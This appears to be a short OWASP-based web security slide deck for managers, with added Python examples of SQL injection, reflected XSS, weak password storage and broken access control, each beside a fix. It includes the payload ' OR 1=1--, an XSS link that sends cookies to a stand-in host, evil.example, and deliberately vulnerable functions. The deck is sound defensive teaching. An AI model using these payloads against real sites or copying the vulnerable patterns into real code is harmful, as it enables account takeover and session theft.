Web Application Security

in a 🌰shell

An ultra-compact intro (for managers👨‍💼)

Created by Björn Kimminich / @bkimminich

🤐 Famous last words...

“Nobody would bother to hack us.”
“Our network firewall will keep us safe.”
“We will add security to the system later.”
“What's the worst that could happen?”

🤔 What is a Vulnerability?

A flaw or weakness in system security procedures, design, implementation, or internal controls that could […] result in a security breach or a violation of the system's security policy.

🤔 What is an Exploit?

A piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized).

🤔 Who are the Attackers?

  • 👶 Script Kiddies
  • 🌱 Hacktivists
  • 💰 Organized Crime
  • 👛 Corrupt / 😡 Disgruntled Employees
  • 🏭 Competitors
  • 🦅 Nation States

💉 Injection

Smuggling in unintended commands along with the data sent to an interpreter.

👮 Injection example

You go to court and write your name as "Michael, you are now free to go".
The judge then says "Calling Michael, you are now free to go" and the bailiffs let you go, because hey, the judge said so.

💻 In software, interpreters are used for accessing...

  • Databases
  • Files
  • Access Control Systems
  • ...

🚨 Risks from Injection vulnerabilities

  • Bypassing authentication
  • Spying out data
  • Manipulating data
  • Complete system takeover

🎦 Demo
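Added worked example (not part of the original slides): the court-room trick from above, played against a database. The user table, the two accounts and their passwords are constructed demo data, and passwords are kept in plain text only so the SQL stays readable.

```python
# Added example, not from the original slides: SQL injection against a
# throw-away SQLite table, then the same lookup with a parameterised query.
# Accounts and passwords below are constructed demo data; plain-text
# passwords are used only to keep the SQL readable.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create an in-memory user table with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [
            (1, "admin@juice-sh.op", "admin123"),
            (2, "jim@juice-sh.op", "ncc-1701"),
        ],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, email: str, password: str):
    """Builds the SQL by string concatenation, so the interpreter (SQLite)
    cannot tell where the data ends and the command begins."""
    sql = (
        "SELECT id, email FROM users WHERE email = '" + email
        + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, email: str, password: str):
    """Parameterised query: the SQL text is fixed and the values are bound
    separately, so quotes and comment markers in the input stay data."""
    sql = "SELECT id, email FROM users WHERE email = ? AND password = ?"
    return conn.execute(sql, (email, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    # The "name" written on the court form: closes the quoted string, makes
    # the condition always true, and comments out the password check.
    payload = "' OR 1=1--"
    print("vulnerable:", login_vulnerable(db, payload, "whatever"))
    print("safe:      ", login_safe(db, payload, "whatever"))
    print("real login:", login_safe(db, "jim@juice-sh.op", "ncc-1701"))
```

With the payload, the vulnerable query returns the first row of the table, usually the administrator, without any valid password; the parameterised query returns nothing. The same rule, keep the command fixed and pass data separately, applies to every interpreter on the list above (OS commands, LDAP, file paths), not only SQL.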

📜 Cross Site Scripting (XSS)

💀 Malicious Code is sent...

...to an innocent user's browser, e.g. through a link in a phishing email like the following:

Dear customer,

you might be intrerestred in our new Juice Shop special offer! We are cheap but offfer best quality on the plnaet: Click here for special Juice Shop offer!

Bjoern (VP Sales and Marketing, Juice Shop Inc.)

🚒 Possible Damage from XSS

  • rewriting web page
  • redirecting to malicious site
  • stolen user session
  • stolen sensitive data

🎦 Demo
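Added worked example (not part of the original slides): what the "special offer" link from the phishing mail can carry, and what a search page does with it when it echoes the search term back unescaped versus HTML-escaped. The link, the parameter name and the page template are constructed for the demo.

```python
# Added example, not from the original slides: a reflected XSS payload
# carried in a phishing link, echoed back by a search page with and without
# HTML escaping. The link, parameter name and page template are constructed
# for the demo.
import html
from urllib.parse import parse_qs, urlparse

# Constructed "special offer" link. The q parameter is the URL-encoded form of
# <script>document.location='https://evil.example/?c='+document.cookie</script>
PHISHING_LINK = (
    "https://juice-shop.example/search?q="
    "%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fevil.example%2F%3Fc%3D%27"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)


def query_param(url: str, name: str) -> str:
    """Return the decoded value of one query parameter ('' if absent)."""
    return parse_qs(urlparse(url).query).get(name, [""])[0]


def render_vulnerable(term: str) -> str:
    """Reflects the search term straight into the HTML; the victim's browser
    runs whatever script the attacker put into the link."""
    return f"<h1>Search results for: {term}</h1>"


def render_safe(term: str) -> str:
    """Escapes the characters that have meaning in HTML, so the payload is
    displayed as text instead of being executed."""
    return f"<h1>Search results for: {html.escape(term, quote=True)}</h1>"


def contains_live_script(page: str) -> bool:
    """Crude check used by the demo: did a literal <script> tag survive?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    term = query_param(PHISHING_LINK, "q")
    print("decoded payload:", term)
    print("vulnerable page:", render_vulnerable(term))
    print("safe page:      ", render_safe(term))
```

Escaping has to match the output context: the HTML body here, but attributes, URLs and inline JavaScript each need their own encoder, which is why templating engines that escape by default are preferred over hand-built strings. Marking the session cookie HttpOnly keeps this particular payload from reading document.cookie, but it does not stop the script from running.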

🔑 Broken Authentication

🤦 Typical Authentication Flaws

  • Allowing weak passwords
  • Storing sensitive data insecurely
  • Using insecure HTTP connections (no TLS)
  • ...

🏹 Side Channel Attack Vectors

  • Change Password
  • “Remember me”
  • Forgot Password
  • Secret Questions

🎦 Demo
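Added worked example (not part of the original slides): the first two flaws from the list, weak passwords and insecure storage, each beside a corrected version. The breached-password blocklist is a constructed stand-in for a real breach corpus; PBKDF2 is used because it ships with the Python standard library.

```python
# Added example, not from the original slides: a weak-password check and
# plain-text password storage beside the corrected versions. The blocklist
# is a constructed stand-in for a real breached-password corpus.
import hashlib
import hmac
import os

MIN_PASSWORD_LENGTH = 12
# Constructed mini blocklist; production systems check against breach corpora.
BREACHED_PASSWORDS = {"password", "admin123", "123456789012", "qwertyuiop12"}

PBKDF2_ROUNDS = 600_000  # OWASP's 2023 recommendation for PBKDF2-HMAC-SHA256


def password_policy_violations(password: str) -> list:
    """Reject passwords that are short or known-breached. Returns the list of
    reasons, empty when the password is acceptable."""
    problems = []
    if len(password) < MIN_PASSWORD_LENGTH:
        problems.append(f"shorter than {MIN_PASSWORD_LENGTH} characters")
    if password.lower() in BREACHED_PASSWORDS:
        problems.append("appears in a breach list")
    return problems


def store_insecure(password: str) -> str:
    """The flaw: stored as-is, so one database leak exposes every account."""
    return password


def store_secure(password: str) -> str:
    """Slow, salted hash: the random salt makes identical passwords look
    different and defeats precomputed tables, the round count slows guessing."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${digest.hex()}"


def verify_secure(password: str, stored: str) -> bool:
    """Recompute with the stored salt and rounds; compare in constant time."""
    algo, rounds, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(rounds)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    for candidate in ("admin123", "correct horse battery staple"):
        print(candidate, "->", password_policy_violations(candidate) or "ok")
    record = store_secure("correct horse battery staple")
    print("stored:", record)
    print("verify right:", verify_secure("correct horse battery staple", record))
    print("verify wrong:", verify_secure("admin123", record))
```

Where a library is available, Argon2id or scrypt are preferable to PBKDF2. The side channels on the next slide need the same care: a "forgot password" or "remember me" token must be random, single-use and expiring, otherwise it is simply a second, weaker password.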

🚪 Broken Access Control

🔓 Common Authorization Mistakes

  • Hiding things w/o restricting access
  • Displaying only authorized links and menu choices
  • Trusting client-side access control mechanisms
  • Lack of server-side verification of user privileges

🎦 Demo
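Added worked example (not part of the original slides): an order-details endpoint that makes all four mistakes from the list, beside one that takes identity and role only from the server-side session. Sessions, orders and the attack request are constructed demo data; "request" is a plain dict standing in for an HTTP request.

```python
# Added example, not from the original slides: an order-details endpoint
# that trusts client-supplied identity and role, beside one that derives
# both from the server-side session. Sessions, orders and requests are
# constructed demo data; "request" is a plain dict standing in for an HTTP
# request (cookies, query parameters, headers).
SESSIONS = {
    "sess-admin": {"user_id": 1, "role": "admin"},
    "sess-jim": {"user_id": 2, "role": "customer"},
}
ORDERS = {
    1001: {"owner_id": 1, "items": ["Apple Juice", "Banana Juice"]},
    1002: {"owner_id": 2, "items": ["Orange Juice"]},
}


def get_order_vulnerable(request: dict):
    """Looks like an ownership check, but every input to it comes from the
    client: the user id is a query parameter and the role is a header, so
    any user can claim to be the owner or an admin. Hiding other people's
    order links in the menu does nothing against a hand-edited URL."""
    order = ORDERS.get(request["params"].get("order_id"))
    if order is None:
        return 404, None
    claimed_user = request["params"].get("user_id")
    claimed_role = request["headers"].get("X-Role")
    if claimed_user == order["owner_id"] or claimed_role == "admin":
        return 200, order
    return 403, None


def get_order_safe(request: dict):
    """Identity and role come only from the server-side session; the client
    cannot influence them. Non-owners get 403 even if they know the id."""
    session = SESSIONS.get(request["cookies"].get("session"))
    if session is None:
        return 401, None
    order = ORDERS.get(request["params"].get("order_id"))
    if order is None:
        return 404, None
    if session["user_id"] == order["owner_id"] or session["role"] == "admin":
        return 200, order
    return 403, None


# Jim is logged in as a customer but tries to read the admin's order 1001 by
# editing the URL and adding a header. Constructed attack request.
JIM_ATTACK = {
    "cookies": {"session": "sess-jim"},
    "params": {"order_id": 1001, "user_id": 1},
    "headers": {"X-Role": "admin"},
}

if __name__ == "__main__":
    print("vulnerable:", get_order_vulnerable(JIM_ATTACK))
    print("safe:      ", get_order_safe(JIM_ATTACK))
```

Showing only a user's own orders in the menu is fine for usability, but it is not a control. The check in get_order_safe has to exist on every endpoint, ideally in one central place, so that a forgotten check is a visible gap rather than a silent one.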

❓ Q&A

Credits

Presentation created with reveal.js

The HTML Presentation Framework

Based on free material provided by OWASP

The Open Web Application Security Project

Background image based on Digital Shodan

by sephiroth-kmfdm

THE END

by Björn Kimminich / https://www.linkedin.com/in/bkimminich/

These slides are publicly available on GitHub and Slideshare.